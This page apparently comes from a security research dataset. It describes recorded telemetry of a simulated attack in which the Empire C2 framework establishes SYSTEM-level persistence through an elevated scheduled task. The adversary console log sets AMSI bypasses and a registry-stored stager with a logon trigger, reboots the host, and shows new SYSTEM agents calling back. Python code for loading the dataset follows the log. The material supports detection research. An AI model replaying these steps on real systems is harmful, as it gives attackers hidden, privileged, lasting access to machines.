Empire Elevated Scheduled Tasks

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/21

Modification Date

2020/09/21

Tactics

TA0003

Techniques

T1053.005

Tags

Local Scheduled Tasks

Dataset Description

This dataset represents adversaries creating and/or executing local scheduled tasks to maintain persistence in an environment.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

schtasks

Adversary View

Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            

4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:57:21  http            

(Empire: agents) > interact 4SUZ8X62
(Empire: 4SUZ8X62) > usemodule persistence/elevated/schtasks*
(Empire: powershell/persistence/elevated/schtasks) > set AMSIBypass2 True
(Empire: powershell/persistence/elevated/schtasks) > set TaskName MordorElevated
(Empire: powershell/persistence/elevated/schtasks) > info

              Name: Invoke-Schtasks
            Module: powershell/persistence/elevated/schtasks
        NeedsAdmin: True
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @mattifestation
  @harmj0y

Description:
  Persist a stager (or script) using schtasks running as
  SYSTEM. This has a moderate detection/removal rating.

Comments:
  https://github.com/mattifestation/PowerSploit/blob/master/Pe
  rsistence/Persistence.psm1

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        4SUZ8X62                  Agent to run module on.                 
  Listener         False       http                      Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       True                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  DailyTime        False                                 Daily time to trigger the script        
                                                        (HH:mm).                                
  IdleTime         False                                 User idle time (in minutes) to trigger  
                                                        script.                                 
  OnLogon          False       True                      Switch. Trigger script on user logon.   
  TaskName         True        MordorElevated            Name to use for the schtask.            
  RegPath          False       HKLM:\Software\Microsoft  Registry location to store the script   
                              \Network\debug            code. Last element is the key name.     
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 4SUZ8X62 to run TASK_CMD_WAIT
[*] Agent 4SUZ8X62 tasked with task ID 1
[*] Tasked agent 4SUZ8X62 to run module powershell/persistence/elevated/schtasks
(Empire: powershell/persistence/elevated/schtasks) > 
SUCCESS: The scheduled task "MordorElevated" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with MordorElevated OnLogon trigger.

(Empire: powershell/persistence/elevated/schtasks) > back
(Empire: 4SUZ8X62) > shell shutdown /r
[*] Tasked 4SUZ8X62 to run TASK_SHELL
[*] Agent 4SUZ8X62 tasked with task ID 2
(Empire: 4SUZ8X62) > 
..Command execution completed.

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5

[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y2ADR48N checked in
[*] New agent D43KCT91 checked in
[+] Initial agent Y2ADR48N from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y2ADR48N at 172.18.39.5
[+] Initial agent D43KCT91 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to D43KCT91 at 172.18.39.5

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------          
5LKFT4WY ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7172   5/0.0    2020-09-21 21:28:46  http            
M43EPU58 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5088   5/0.0    2020-09-21 21:43:06  http            

4SUZ8X62 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4092   5/0.0    2020-09-21 21:59:29  http            
Y2ADR48N ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         620    5/0.0    2020-09-21 22:01:50  http            
D43KCT91 ps 172.18.39.5     WORKSTATION5      *THESHIRE\SYSTEM        powershell         636    5/0.0    2020-09-21 22:01:51  http            

(Empire: agents) > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_schtasks_creation_execution_elevated_user.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)